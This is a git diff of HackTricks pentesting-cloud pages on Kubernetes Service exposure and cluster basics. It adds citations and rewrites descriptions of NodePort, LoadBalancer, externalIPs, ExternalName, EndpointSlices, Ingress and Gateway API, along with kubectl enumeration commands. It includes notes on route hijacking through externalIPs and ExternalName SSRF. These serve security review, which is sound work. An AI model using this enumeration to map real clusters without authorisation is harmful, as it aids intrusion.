+When **NodePort** is utilised, a designated port is made available on all Nodes (representing the Virtual Machines). **Traffic** directed to this specific port is then systematically **routed to the service**. Typically, this method is not recommended due to its drawbacks.<sup>[[2]](#references)[[1]](#references)</sup>
 
 List all NodePorts:
 
@@ -74,7 +74,7 @@ List all NodePorts:
 kubectl get services --all-namespaces -o=custom-columns='NAMESPACE:.metadata.namespace,NAME:.metadata.name,TYPE:.spec.type,CLUSTER-IP:.spec.clusterIP,PORT(S):.spec.ports[*].port,NODEPORT(S):.spec.ports[*].nodePort,TARGETPORT(S):.spec.ports[*].targetPort,SELECTOR:.spec.selector' | grep NodePort
 ```
 
-An example of NodePort specification:
+An example of NodePort specification:<sup>[[2]](#references)[[1]](#references)</sup>
 
 ```yaml
 apiVersion: v1
@@ -93,27 +93,27 @@ spec:
       protocol: TCP
 ```
 
-If you **don't specify** the **nodePort** in the yaml (it's the port that will be opened) a port in the **range 30000–32767 will be used**.
+If you **don't specify** the **nodePort** in the yaml (it's the port that will be opened) a port in the **range 30000–32767 will be used**.<sup>[[2]](#references)</sup>
 
-When reviewing NodePort or LoadBalancer Services, also inspect traffic-policy fields because they change which nodes and backends are useful from a given source:
+When reviewing NodePort or LoadBalancer Services, also inspect traffic-policy fields because they change which nodes and backends are useful from a given source:<sup>[[5]](#references)[[6]](#references)[[7]](#references)</sup>
 
 ```bash
 kubectl get services --all-namespaces \
   -o custom-columns='NAMESPACE:.metadata.namespace,NAME:.metadata.name,TYPE:.spec.type,ETP:.spec.externalTrafficPolicy,ITP:.spec.internalTrafficPolicy,AFFINITY:.spec.sessionAffinity,DIST:.spec.trafficDistribution,NODEPORTS:.spec.ports[*].nodePort'
 ```
 
-- NodePorts are normally exposed on node addresses, but kube-proxy can restrict the address ranges with `--nodeport-addresses` or `nodePortAddresses` in its configuration. Check the active kube-proxy or CNI service-proxy replacement configuration before assuming the NodePort is reachable on every node IP.
-- `externalTrafficPolicy: Local` preserves the original client source IP for NodePort/LoadBalancer traffic and avoids forwarding to endpoints on other nodes. A node without a local ready endpoint may drop the traffic even if the Service has endpoints elsewhere.
-- `externalTrafficPolicy: Cluster` is the default and can forward through any node, but backend logs may see node IPs instead of the real external client IP.
-- `internalTrafficPolicy: Local` limits in-cluster Service traffic to endpoints local to the source node. This is locality routing, not an authorization boundary.
-- `sessionAffinity: ClientIP` can make repeated tests from one client hit the same backend, hiding other ready endpoints during manual checks.
-- `trafficDistribution` and EndpointSlice topology hints can prefer same-zone or same-node endpoints on newer clusters; treat them as routing preferences rather than hard security policy.
+- NodePorts are normally exposed on node addresses, but kube-proxy can restrict the address ranges with `--nodeport-addresses` or `nodePortAddresses` in its configuration. Check the active kube-proxy or CNI service-proxy replacement configuration before assuming the NodePort is reachable on every node IP.<sup>[[2]](#references)[[3]](#references)</sup>
+- `externalTrafficPolicy: Local` preserves the original client source IP for NodePort/LoadBalancer traffic and avoids forwarding to endpoints on other nodes. A node without a local ready endpoint may drop the traffic even if the Service has endpoints elsewhere.<sup>[[6]](#references)</sup>
+- `externalTrafficPolicy: Cluster` is the default and can forward through any node, but backend logs may see node IPs instead of the real external client IP.<sup>[[6]](#references)</sup>
+- `internalTrafficPolicy: Local` limits in-cluster Service traffic to endpoints local to the source node. This is locality routing, not an authorization boundary.<sup>[[5]](#references)</sup>
+- `sessionAffinity: ClientIP` can make repeated tests from one client hit the same backend, hiding other ready endpoints during manual checks.<sup>[[2]](#references)</sup>
+- `trafficDistribution` and EndpointSlice topology hints can prefer same-zone or same-node endpoints on newer clusters; treat them as routing preferences rather than hard security policy.<sup>[[2]](#references)[[7]](#references)</sup>
 
 ### LoadBalancer
 
-Exposes the Service externally **using a cloud provider's load balancer**. On GKE, this will spin up a [Network Load Balancer](https://cloud.google.com/compute/docs/load-balancing/network/) that will give you a single IP address that will forward all traffic to your service. In AWS it will launch a Load Balancer.
+Exposes the Service externally **using a cloud provider's load balancer**. On GKE, this will spin up a [Network Load Balancer](https://cloud.google.com/compute/docs/load-balancing/network/) that will give you a single IP address that will forward all traffic to your service. In AWS it will launch a Load Balancer.<sup>[[2]](#references)[[18]](#references)</sup>
 
-You have to pay for a LoadBalancer per exposed service, which can be expensive.
+You have to pay for a LoadBalancer per exposed service, which can be expensive.<sup>[[1]](#references)</sup>
 
 List all LoadBalancers:
 
@@ -124,15 +124,15 @@ kubectl get services --all-namespaces -o=custom-columns='NAMESPACE:.metadata.nam
 ### External IPs
 
 > [!TIP]
-> External IPs are exposed by services of type Load Balancers and they are generally used when an external Cloud Provider Load Balancer is being used.
+> External IPs are exposed by services of type Load Balancers and they are generally used when an external Cloud Provider Load Balancer is being used.<sup>[[2]](#references)[[4]](#references)</sup>
 >
-> For finding them, check for load balancers with values in the `EXTERNAL-IP` field.
+> For finding them, check for load balancers with values in the `EXTERNAL-IP` field.<sup>[[2]](#references)[[4]](#references)</sup>
 
-Traffic that ingresses into the cluster with the **external IP** (as **destination IP**), on the Service port, will be **routed to one of the Service endpoints**. `externalIPs` are not managed by Kubernetes and are the responsibility of the cluster administrator.
+Traffic that ingresses into the cluster with the **external IP** (as **destination IP**), on the Service port, will be **routed to one of the Service endpoints**. `externalIPs` are not managed by Kubernetes and are the responsibility of the cluster administrator.<sup>[[2]](#references)[[4]](#references)</sup>
 
-`externalIPs` is a sensitive route-control field because a user who can set it might claim traffic for an IP address the Service owner should not control if the surrounding network routes that IP to the cluster. Kubernetes announced the deprecation and planned removal of Service `externalIPs` in v1.36, so prefer controller-owned exposure mechanisms such as LoadBalancer integrations or Gateway API where possible, and restrict/admit this field carefully while it still exists.
+`externalIPs` is a sensitive route-control field because a user who can set it might claim traffic for an IP address the Service owner should not control if the surrounding network routes that IP to the cluster. Kubernetes announced the deprecation and planned removal of Service `externalIPs` in v1.36, so prefer controller-owned exposure mechanisms such as LoadBalancer integrations or Gateway API where possible, and restrict/admit this field carefully while it still exists.<sup>[[4]](#references)</sup>
 
-In the Service spec, `externalIPs` can be specified along with any of the `ServiceTypes`. In the example below, "`my-service`" can be accessed by clients on "`80.11.12.10:80`" (`externalIP:port`)
+In the Service spec, `externalIPs` can be specified along with any of the `ServiceTypes`. In the example below, "`my-service`" can be accessed by clients on "`80.11.12.10:80`" (`externalIP:port`)<sup>[[2]](#references)</sup>
 
 ```yaml
 apiVersion: v1
@@ -153,9 +153,9 @@ spec:
 
 ### ExternalName
 
-[**From the docs:**](https://kubernetes.io/docs/concepts/services-networking/service/#externalname) Services of type ExternalName **map a Service to a DNS name**, not to a typical selector such as `my-service` or `cassandra`. You specify these Services with the `spec.externalName` parameter.
+[**From the docs:**](https://kubernetes.io/docs/concepts/services-networking/service/#externalname) Services of type ExternalName **map a Service to a DNS name**, not to a typical selector such as `my-service` or `cassandra`. You specify these Services with the `spec.externalName` parameter.<sup>[[2]](#references)</sup>
 
-This Service definition, for example, maps the `my-service` Service in the `prod` namespace to `my.database.example.com`:
+This Service definition, for example, maps the `my-service` Service in the `prod` namespace to `my.database.example.com`:<sup>[[2]](#references)</sup>
 
 ```yaml
 apiVersion: v1
@@ -168,9 +168,9 @@ spec:
   externalName: my.database.example.com
 ```
 
-When looking up the host `my-service.prod.svc.cluster.local`, the cluster DNS Service returns a `CNAME` record with the value `my.database.example.com`. Accessing `my-service` works in the same way as other Services but with the crucial difference that **redirection happens at the DNS level** rather than via proxying or forwarding.
+When looking up the host `my-service.prod.svc.cluster.local`, the cluster DNS Service returns a `CNAME` record with the value `my.database.example.com`. Accessing `my-service` works in the same way as other Services but with the crucial difference that **redirection happens at the DNS level** rather than via proxying or forwarding.<sup>[[2]](#references)</sup>
 
-Security review note: if an Ingress controller, Gateway implementation, service mesh, or application accepts an ExternalName Service as a backend, the controller may resolve and reach the external name from its own network position. That can expose internal-only services through public routing infrastructure when users can create both the route object and the ExternalName Service. Review the specific controller implementation and version, ExternalName support flags or allowlists, route status, and the exact target domain before treating this as safe. For example, Skipper patched a Kubernetes ExternalName SSRF issue in v0.24.0 by disabling ExternalName backends by default and documenting an allowlist option.
+Security review note: if an Ingress controller, Gateway implementation, service mesh, or application accepts an ExternalName Service as a backend, the controller may resolve and reach the external name from its own network position. That can expose internal-only services through public routing infrastructure when users can create both the route object and the ExternalName Service. Review the specific controller implementation and version, ExternalName support flags or allowlists, route status, and the exact target domain before treating this as safe. For example, Skipper patched a Kubernetes ExternalName SSRF issue in v0.24.0 by disabling ExternalName backends by default and documenting an allowlist option.<sup>[[2]](#references)[[12]](#references)</sup>
 
 List all ExternalNames:
 
@@ -180,7 +180,7 @@ kubectl get services --all-namespaces | grep ExternalName
 
 ### EndpointSlices
 
-EndpointSlices show the concrete backend addresses and ports that a Service currently routes to. They are especially useful when a Service has no selector, when labels do not explain the traffic path, or when only some backends are ready.
+EndpointSlices show the concrete backend addresses and ports that a Service currently routes to. They are especially useful when a Service has no selector, when labels do not explain the traffic path, or when only some backends are ready.<sup>[[8]](#references)</sup>
 
 List EndpointSlices associated with Services:
 
@@ -191,17 +191,17 @@ kubectl get endpointslice -n <namespace> -l kubernetes.io/service-name=<service-
   -o custom-columns='NAME:.metadata.name,ADDR:.endpoints[*].addresses,READY:.endpoints[*].conditions.ready,PORTS:.ports[*].port'
 ```
 
-When reviewing exposure, compare the Service selector with the EndpointSlice `targetRef`, endpoint addresses, readiness conditions, and ports. A selectorless Service can be paired with manually managed EndpointSlices and route traffic to non-Pod or unexpected destinations.
+When reviewing exposure, compare the Service selector with the EndpointSlice `targetRef`, endpoint addresses, readiness conditions, and ports. A selectorless Service can be paired with manually managed EndpointSlices and route traffic to non-Pod or unexpected destinations.<sup>[[2]](#references)[[8]](#references)</sup>
 
 ### Ingress
 
-Unlike all the above examples, **Ingress is NOT a type of service**. Instead, it sits **in front of multiple services and act as a “smart router”** or entrypoint into your cluster.
+Unlike all the above examples, **Ingress is NOT a type of service**. Instead, it sits **in front of multiple services and act as a “smart router”** or entrypoint into your cluster.<sup>[[2]](#references)[[1]](#references)</sup>
 
-You can do a lot of different things with an Ingress, and there are **many types of Ingress controllers that have different capabilities**.
+You can do a lot of different things with an Ingress, and there are **many types of Ingress controllers that have different capabilities**.<sup>[[1]](#references)</sup>
 
-The default GKE ingress controller will spin up a [HTTP(S) Load Balancer](https://cloud.google.com/compute/docs/load-balancing/http/) for you. This will let you do both path based and subdomain based routing to backend services. For example, you can send everything on foo.yourdomain.com to the foo service, and everything under the yourdomain.com/bar/ path to the bar service.
+The default GKE ingress controller will spin up a [HTTP(S) Load Balancer](https://cloud.google.com/compute/docs/load-balancing/http/) for you. This will let you do both path based and subdomain based routing to backend services. For example, you can send everything on foo.yourdomain.com to the foo service, and everything under the yourdomain.com/bar/ path to the bar service.<sup>[[19]](#references)</sup>
 
-The YAML for a Ingress object on GKE with a [L7 HTTP Load Balancer](https://cloud.google.com/compute/docs/load-balancing/http/) might look like this:
+The YAML for a Ingress object on GKE with a [L7 HTTP Load Balancer](https://cloud.google.com/compute/docs/load-balancing/http/) might look like this:<sup>[[19]](#references)[[1]](#references)</sup>
 
 ```yaml
 apiVersion: networking.k8s.io/v1
@@ -251,7 +251,7 @@ kubectl get ingresses --all-namespaces -o=yaml
 
 ### Gateway API
 
-Gateway API is the newer Kubernetes API for exposing Services. It separates infrastructure-owned Gateway objects from application-owned Route objects such as HTTPRoute. This is useful for delegation, but it also means exposure can be split across namespaces.
+Gateway API is the newer Kubernetes API for exposing Services. It separates infrastructure-owned Gateway objects from application-owned Route objects such as HTTPRoute. This is useful for delegation, but it also means exposure can be split across namespaces.<sup>[[14]](#references)</sup>
 
 List Gateway API exposure objects:
 
@@ -266,23 +266,30 @@ kubectl get gateway -n <namespace> <gateway-name> -o yaml
 kubectl get httproute -n <namespace> <route-name> -o yaml
 ```
 
-Check Gateway listeners, allowed route namespaces, Route `parentRefs`, hostnames or SNI matches, filters, backend references, and status conditions such as `Accepted`, `ResolvedRefs`, and `Programmed`. A Route that is accepted by a shared Gateway can expose a backend even when no legacy Ingress object exists.
+Check Gateway listeners, allowed route namespaces, Route `parentRefs`, hostnames or SNI matches, filters, backend references, and status conditions such as `Accepted`, `ResolvedRefs`, and `Programmed`. A Route that is accepted by a shared Gateway can expose a backend even when no legacy Ingress object exists.<sup>[[14]](#references)[[15]](#references)</sup>
 
-Do not check only HTTPRoute. GRPCRoute, TLSRoute, TCPRoute, and UDPRoute can expose non-HTTP services such as admin ports, brokers, databases, service-mesh gateways, or pass-through TLS backends. Also review `ReferenceGrant` objects for cross-namespace backend or certificate references and `BackendTLSPolicy` for the TLS identity the Gateway uses when connecting to backend Services. Backend TLS policy is not proof of public reachability by itself, but it is useful evidence when a programmed Gateway route reaches a ready Service with weak, shared, or wrong backend identity validation.
+Do not check only HTTPRoute. GRPCRoute, TLSRoute, TCPRoute, and UDPRoute can expose non-HTTP services such as admin ports, brokers, databases, service-mesh gateways, or pass-through TLS backends. Also review `ReferenceGrant` objects for cross-namespace backend or certificate references and `BackendTLSPolicy` for the TLS identity the Gateway uses when connecting to backend Services.<sup>[[10]](#references)[[15]](#references)[[16]](#references)[[17]](#references)</sup> Backend TLS policy is not proof of public reachability by itself, but it is useful evidence when a programmed Gateway route reaches a ready Service with weak, shared, or wrong backend identity validation.
 
-### References
+## References
 
-- [https://medium.com/google-cloud/kubernetes-nodeport-vs-loadbalancer-vs-ingress-when-should-i-use-what-922f010849e0](https://medium.com/google-cloud/kubernetes-nodeport-vs-loadbalancer-vs-ingress-when-should-i-use-what-922f010849e0)
-- [https://kubernetes.io/docs/concepts/services-networking/service/](https://kubernetes.io/docs/concepts/services-networking/service/)
-- [https://kubernetes.io/docs/reference/command-line-tools-reference/kube-proxy/](https://kubernetes.io/docs/reference/command-line-tools-reference/kube-proxy/)
-- [https://kubernetes.io/blog/2026/05/14/kubernetes-v1-36-deprecation-and-removal-of-service-externalips/](https://kubernetes.io/blog/2026/05/14/kubernetes-v1-36-deprecation-and-removal-of-service-externalips/)
-- [https://kubernetes.io/docs/concepts/services-networking/service-traffic-policy/](https://kubernetes.io/docs/concepts/services-networking/service-traffic-policy/)
-- [https://kubernetes.io/docs/tutorials/services/source-ip/](https://kubernetes.io/docs/tutorials/services/source-ip/)
-- [https://kubernetes.io/docs/concepts/services-networking/topology-aware-routing/](https://kubernetes.io/docs/concepts/services-networking/topology-aware-routing/)
-- [https://kubernetes.io/docs/concepts/services-networking/endpoint-slices/](https://kubernetes.io/docs/concepts/services-networking/endpoint-slices/)
-- [https://gateway-api.sigs.k8s.io/](https://gateway-api.sigs.k8s.io/)
-- [https://kubernetes.io/blog/2025/11/06/gateway-api-v1-4/](https://kubernetes.io/blog/2025/11/06/gateway-api-v1-4/)
-- [https://gateway-api.sigs.k8s.io/api-types/backendtlspolicy/](https://gateway-api.sigs.k8s.io/api-types/backendtlspolicy/)
-- [https://github.com/zalando/skipper/security/advisories/GHSA-mxxc-p822-2hx9](https://github.com/zalando/skipper/security/advisories/GHSA-mxxc-p822-2hx9)
+- [1] [Kubernetes NodePort vs LoadBalancer vs Ingress: When should I use what?](https://medium.com/google-cloud/kubernetes-nodeport-vs-loadbalancer-vs-ingress-when-should-i-use-what-922f010849e0)
+- [2] [Service](https://kubernetes.io/docs/concepts/services-networking/service/)
+- [3] [kube-proxy](https://kubernetes.io/docs/reference/command-line-tools-reference/kube-proxy/)
+- [4] [Kubernetes v1.36: Deprecation and removal of Service ExternalIPs](https://kubernetes.io/blog/2026/05/14/kubernetes-v1-36-deprecation-and-removal-of-service-externalips/)
+- [5] [Service Internal Traffic Policy](https://kubernetes.io/docs/concepts/services-networking/service-traffic-policy/)
+- [6] [Using Source IP](https://kubernetes.io/docs/tutorials/services/source-ip/)
+- [7] [Topology Aware Routing](https://kubernetes.io/docs/concepts/services-networking/topology-aware-routing/)
+- [8] [EndpointSlices](https://kubernetes.io/docs/concepts/services-networking/endpoint-slices/)
+- [9] [Gateway API](https://gateway-api.sigs.k8s.io/)
+- [10] [Gateway API 1.4: New Features](https://kubernetes.io/blog/2025/11/06/gateway-api-v1-4/)
+- [11] [BackendTLSPolicy](https://gateway-api.sigs.k8s.io/api-types/backendtlspolicy/)
+- [12] [dataclient/kubernetes ExternalName SSRF Leading to Internal Service Exposure](https://github.com/zalando/skipper/security/advisories/GHSA-mxxc-p822-2hx9)
+- [13] [kubectl proxy](https://kubernetes.io/docs/reference/kubectl/generated/kubectl_proxy/)
+- [14] [API Overview](https://gateway-api.sigs.k8s.io/docs/concepts/api-overview/)
+- [15] [Implementer's Guide](https://gateway-api.sigs.k8s.io/guides/implementers-guide/)
+- [16] [ReferenceGrant](https://gateway-api.sigs.k8s.io/reference/api-types/referencegrant/)
+- [17] [BackendTLSPolicy](https://gateway-api.sigs.k8s.io/reference/api-types/policy/backendtlspolicy/)
+- [18] [Backend service-based regional external passthrough Network Load Balancer overview](https://cloud.google.com/compute/docs/load-balancing/network/)
+- [19] [External Application Load Balancer overview](https://cloud.google.com/compute/docs/load-balancing/http/)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/kubernetes-security/kubernetes-basics.md
+++ b/src/pentesting-cloud/kubernetes-security/kubernetes-basics.md
@@ -2,7 +2,7 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-**The original author of this page is** [**Jorge**](https://www.linkedin.com/in/jorge-belmonte-a924b616b/) **(read his original post** [**here**](https://sickrov.github.io)**)**
+**The original author of this page is** [**Jorge**](https://www.linkedin.com/in/jorge-belmonte-a924b616b/) **(read his original post** [**here**](https://sickrov.github.io)**)**<sup>[[1]](#references)</sup>
 
 ## Architecture & Basics
 
@@ -17,60 +17,59 @@
 
 ### Architecture
 
-![Kubernetes architecture diagram showing control plane components, API server, kubelet, kube-proxy, pods, and worker nodes](https://sickrov.github.io/media/Screenshot-68.jpg)
+![Kubernetes architecture diagram showing control plane components, API server, kubelet, kube-proxy, pods, and worker nodes](https://sickrov.github.io/media/Screenshot-68.jpg)<sup>[[1]](#references)</sup>
 
-- **Node**: operating system with pod or pods.
-  - **Pod**: Wrapper around a container or multiple containers with. A pod should only contain one application (so usually, a pod run just 1 container). The pod is the way kubernetes abstracts the container technology running.
-    - **Service**: Each pod has 1 internal **IP address** from the internal range of the node. However, it can be also exposed via a service. The **service has also an IP address** and its goal is to maintain the communication between pods so if one dies the **new replacement** (with a different internal IP) **will be accessible** exposed in the **same IP of the service**. It can be configured as internal or external. The service also actuates as a **load balancer when 2 pods are connected** to the same service.\
-      When a **service** is **created** you can find the endpoints of each service running `kubectl get endpoints`
-- **Kubelet**: Primary node agent. The component that establishes communication between node and kubectl, and only can run pods (through API server). The kubelet doesn’t manage containers that were not created by Kubernetes.
-- **Kube-proxy**: is the service in charge of the communications (services) between the apiserver and the node. The base is an IPtables for nodes. Most experienced users could install other kube-proxies from other vendors.
+- **Node**: operating system with one or more Pods.
+  - **Pod**: A Pod wraps one or more containers that share storage and networking. A Pod often contains one application, although tightly coupled sidecars can run beside it.<sup>[[1]](#references)[[11]](#references)[[12]](#references)</sup>
+    - **Service**: A Pod normally receives its own IP address, while a Service provides a stable virtual IP and endpoint set for one or more Pods. If a Pod is replaced, clients continue to use the Service rather than the replacement Pod IP. A Service can be internal or external and can distribute traffic across matching Pods. When a **service** is **created** you can inspect its endpoints with `kubectl get endpoints`.<sup>[[1]](#references)[[13]](#references)</sup>
+- **Kubelet**: Primary node agent that ensures Pods and their containers are running on the node. It manages Kubernetes-created workloads rather than containers started independently of Kubernetes.<sup>[[1]](#references)[[11]](#references)</sup>
+- **Kube-proxy**: An optional node component that maintains network rules implementing Kubernetes Services. Implementations commonly use iptables or other proxy modes, and third-party replacements are possible.<sup>[[1]](#references)[[11]](#references)</sup>
 - **Sidecar container**: Sidecar containers are the containers that should run along with the main container in the pod. This sidecar pattern extends and enhances the functionality of current containers without changing them. Nowadays, We know that we use container technology to wrap all the dependencies for the application to run anywhere. A container does only one thing and does that thing very well.
 - **Master process:**
-  - **Api Server:** Is the way the users and the pods use to communicate with the master process. Only authenticated request should be allowed.
-  - **Scheduler**: Scheduling refers to making sure that Pods are matched to Nodes so that Kubelet can run them. It has enough intelligence to decide which node has more available resources the assign the new pod to it. Note that the scheduler doesn't start new pods, it just communicate with the Kubelet process running inside the node, which will launch the new pod.
-  - **Kube Controller manager**: It checks resources like replica sets or deployments to check if, for example, the correct number of pods or nodes are running. In case a pod is missing, it will communicate with the scheduler to start a new one. It controls replication, tokens, and account services to the API.
-  - **etcd**: Data storage, persistent, consistent, and distributed. Is Kubernetes’s database and the key-value storage where it keeps the complete state of the clusters (each change is logged here). Components like the Scheduler or the Controller manager depends on this date to know which changes have occurred (available resourced of the nodes, number of pods running...)
-- **Cloud controller manager**: Is the specific controller for flow controls and applications, i.e: if you have clusters in AWS or OpenStack.
+  - **API server:** Exposes the Kubernetes HTTP API used by authenticated clients and components.<sup>[[1]](#references)[[11]](#references)</sup>
+  - **Scheduler**: Watches for Pods that are not assigned to a node and selects a suitable node using scheduling constraints and available resources; it does not start the Pod itself, because the kubelet runs it.<sup>[[1]](#references)[[11]](#references)</sup>
+  - **Kube-controller-manager**: Runs controllers that reconcile the actual cluster state with the desired state described through the Kubernetes API, including controllers for replication, tokens, and accounts.<sup>[[1]](#references)[[11]](#references)</sup>
+  - **etcd**: A consistent, highly available key-value store for API server data and the cluster state. Components such as the scheduler and controller manager use that state to observe changes in resources.<sup>[[1]](#references)[[11]](#references)</sup>
+- **Cloud controller manager**: An optional component that integrates Kubernetes with an underlying cloud provider, such as AWS or OpenStack.<sup>[[1]](#references)[[11]](#references)</sup>
 
-Note that as the might be several nodes (running several pods), there might also be several master processes which their access to the Api server load balanced and their etcd synchronized.
+Clusters can have multiple control-plane processes and API servers; highly available deployments place them behind a load balancer and keep their etcd configuration synchronized.<sup>[[11]](#references)</sup>
 
 **Volumes:**
 
-When a pod creates data that shouldn't be lost when the pod disappear it should be stored in a physical volume. **Kubernetes allow to attach a volume to a pod to persist the data**. The volume can be in the local machine or in a **remote storage**. If you are running pods in different physical nodes you should use a remote storage so all the pods can access it.
+When a Pod creates data that should survive Pod replacement, store it in a volume. **Kubernetes allows a volume to be attached to a Pod to persist data**. The volume can be on the local machine or in **remote storage**; workloads spread across nodes generally need storage that all of their Pods can access.<sup>[[14]](#references)</sup>
 
-Kubernetes also supports **image volumes** in recent versions. An `image` volume mounts an OCI image or artifact as a **read-only** filesystem source inside the Pod, using fields such as `volumes[].image.reference` and `volumes[].image.pullPolicy`. The kubelet pulls the artifact with the same credential sources used for container images, including node credentials, Pod `imagePullSecrets`, and ServiceAccount `imagePullSecrets`. During a security review, treat image volumes as runtime inputs and supply-chain dependencies: check whether the reference is pinned by digest, which registry credentials can fetch it, where it is mounted, and whether `subPath` limits the visible directory.
+Kubernetes also supports **image volumes** in recent versions. An `image` volume mounts an OCI image or artifact as a **read-only** filesystem source inside the Pod, using fields such as `volumes[].image.reference` and `volumes[].image.pullPolicy`. The kubelet pulls the artifact with the same credential sources used for container images, including node credentials, Pod `imagePullSecrets`, and ServiceAccount `imagePullSecrets`. During a security review, treat image volumes as runtime inputs and supply-chain dependencies: check whether the reference is pinned by digest, which registry credentials can fetch it, where it is mounted, and whether `subPath` limits the visible directory.<sup>[[9]](#references)[[10]](#references)</sup>
 
 **Other configurations:**
 
-- **ConfigMap**: You can configure **URLs** to access services. The pod will obtain data from here to know how to communicate with the rest of the services (pods). Note that this is not the recommended place to save credentials!
-- **Secret**: This is the place to **store secret data** like passwords, API keys... encoded in B64. The pod will be able to access this data to use the required credentials.
-- **Deployments**: This is where the components to be run by kubernetes are indicated. A user usually won't work directly with pods, pods are abstracted in **ReplicaSets** (number of same pods replicated), which are run via deployments. Note that deployments are for **stateless** applications. The minimum configuration for a deployment is the name and the image to run.
-- **StatefulSet**: This component is meant specifically for applications like **databases** which needs to **access the same storage**.
-- **Ingress**: This is the configuration that is use to **expose the application publicly with an URL**. Note that this can also be done using external services, but this is the correct way to expose the application.
-  - If you implement an Ingress you will need to create **Ingress Controllers**. The Ingress Controller is a **pod** that will be the endpoint that will receive the requests and check and will load balance them to the services. the ingress controller will **send the request based on the ingress rules configured**. Note that the ingress rules can point to different paths or even subdomains to different internal kubernetes services.
+- **ConfigMap**: Stores non-confidential key-value configuration such as **service URLs** for Pods to consume. Do not use it for credentials.<sup>[[15]](#references)</sup>
+- **Secret**: Stores sensitive data such as passwords and API keys. Values in the `data` field are base64-encoded, which is not encryption; Pods can consume them as files or environment variables.<sup>[[25]](#references)</sup>
+- **Deployments**: Describe the desired state of usually stateless applications and manage their Pods through ReplicaSets. The minimum configuration for a Deployment is its name and the image to run.<sup>[[16]](#references)</sup>
+- **StatefulSet**: Manages stateful applications, including databases, with stable Pod identities and persistent storage.<sup>[[17]](#references)</sup>
+- **Ingress**: Configures HTTP and HTTPS routes to **expose applications publicly with URLs**. External `NodePort` or `LoadBalancer` Services can also expose workloads.<sup>[[13]](#references)[[18]](#references)</sup>
+  - An Ingress requires an **Ingress Controller**, which receives requests, evaluates the rules, and routes or load-balances traffic to Services. The controller need not itself be a single Pod; rules can route different paths or subdomains to different Kubernetes Services.
     - A better security practice would be to use a cloud load balancer or a proxy server as entrypoint to don't have any part of the Kubernetes cluster exposed.
-    - When request that doesn't match any ingress rule is received, the ingress controller will direct it to the "**Default backend**". You can `describe` the ingress controller to get the address of this parameter.
+    - When a request does not match an Ingress rule, the controller can direct it to a configured **default backend**; `kubectl describe` can help inspect the controller configuration and address.
     - `minikube addons enable ingress`
 
 ### PKI infrastructure - Certificate Authority CA:
 
-![Kubernetes CA and PKI diagram showing API server certificates between clients, scheduler, controller manager, kubelet, and etcd](https://sickrov.github.io/media/Screenshot-66.jpg)
+![Kubernetes CA and PKI diagram showing API server certificates between clients, scheduler, controller manager, kubelet, and etcd](https://sickrov.github.io/media/Screenshot-66.jpg)<sup>[[1]](#references)</sup>
 
-- CA is the trusted root for all certificates inside the cluster.
-- Allows components to validate to each other.
-- All cluster certificates are signed by the CA.
-- ETCd has its own certificate.
+- CA is the trusted root for certificates used inside the cluster.<sup>[[1]](#references)[[19]](#references)</sup>
+- It allows components to authenticate and validate one another.<sup>[[1]](#references)[[19]](#references)</sup>
+- Cluster certificates are signed by a CA according to the cluster's PKI configuration.<sup>[[1]](#references)[[19]](#references)</sup>
+- etcd has its own server certificate.<sup>[[1]](#references)[[19]](#references)</sup>
 - types:
   - apiserver cert.
   - kubelet cert.
-  - scheduler cert.
+  - scheduler cert.<sup>[[1]](#references)[[19]](#references)</sup>
 
 ## Basic Actions
 
 ### Minikube
 
-**Minikube** can be used to perform some **quick tests** on kubernetes without needing to deploy a whole kubernetes environment. It will run the **master and node processes in one machine**. Minikube will use virtualbox to run the node. See [**here how to install it**](https://minikube.sigs.k8s.io/docs/start/).
+**Minikube** can be used for **quick tests** without deploying a full Kubernetes environment. It runs a local cluster; the common single-node profile runs the control-plane and node processes on one machine, with a driver such as Docker or VirtualBox providing the node environment. The transcript below records an older VirtualBox run; see [**the installation instructions**](https://minikube.sigs.k8s.io/docs/start/).<sup>[[21]](#references)</sup>
 
 ```
 $ minikube start
@@ -109,7 +108,7 @@ $ minikube delete
 
 ### Kubectl Basics
 
-**`Kubectl`** is the command line tool for kubernetes clusters. It communicates with the Api server of the master process to perform actions in kubernetes or to ask for data.
+**`kubectl`** is the command-line tool for communicating with a Kubernetes cluster through the Kubernetes API.<sup>[[20]](#references)</sup>
 
 ```bash
 kubectl version #Get client and server version
@@ -144,7 +143,7 @@ kubectl apply -f deployment.yml
 
 ### Minikube Dashboard
 
-The dashboard allows you to see easier what is minikube running, you can find the URL to access it in:
+The dashboard provides a web UI for inspecting and managing workloads in Minikube. Use the URL-only mode to print the local proxy URL:<sup>[[22]](#references)</sup>
 
 ```
 minikube dashboard --url
@@ -161,12 +160,12 @@ http://127.0.0.1:50034/api/v1/namespaces/kubernetes-dashboard/services/http:kube
 
 ### YAML configuration files examples
 
-Each configuration file has 3 parts: **metadata**, **specification** (what need to be launch), **status** (desired state).\
+Each configuration file has 3 parts: **metadata**, **specification** (the desired configuration), and **status** (the observed state).\
 Inside the specification of the deployment configuration file you can find the template defined with a new configuration structure defining the image to run:
 
-**Example of Deployment + Service declared in the same configuration file (from** [**here**](https://gitlab.com/nanuchi/youtube-tutorial-series/-/blob/master/demo-kubernetes-components/mongo.yaml)**)**
+**Example of Deployment + Service declared in the same configuration file (from** [**here**](https://gitlab.com/nanuchi/youtube-tutorial-series/-/blob/master/demo-kubernetes-components/mongo.yaml)**)<sup>[[2]](#references)[[23]](#references)</sup>
 
-As a service usually is related to one deployment it's possible to declare both in the same configuration file (the service declared in this config is only accessible internally):
+As a Service is usually related to one Deployment, both can be declared in the same configuration file. The Service in this example has the default internal `ClusterIP` type.<sup>[[13]](#references)[[23]](#references)</sup>
 
 ```yaml
 apiVersion: apps/v1
@@ -217,7 +216,7 @@ spec:
 
 **Example of external service config**
 
-This service will be accessible externally (check the `nodePort` and `type: LoadBlancer` attributes):
+This Service can be accessible externally through its `nodePort` and `type: LoadBalancer` attributes:<sup>[[13]](#references)</sup>
 
 ```yaml
 ---
@@ -241,7 +240,7 @@ spec:
 
 **Example of Ingress config file**
 
-This will expose the application in `http://dashboard.com`.
+This will expose the application in `http://dashboard.com`.<sup>[[2]](#references)</sup>
 
 ```yaml
 apiVersion: networking.k8s.io/v1
@@ -259,9 +258,33 @@ spec:
               servicePort: 80
 ```
 
+**Additional current `networking.k8s.io/v1` example:**
+
+On current clusters, the equivalent backend uses an explicit Service name and port, together with `path` and `pathType` fields.<sup>[[18]](#references)</sup>
+
+```yaml
+apiVersion: networking.k8s.io/v1
+kind: Ingress
+metadata:
+  name: dashboard-ingress
+  namespace: kubernetes-dashboard
+spec:
+  rules:
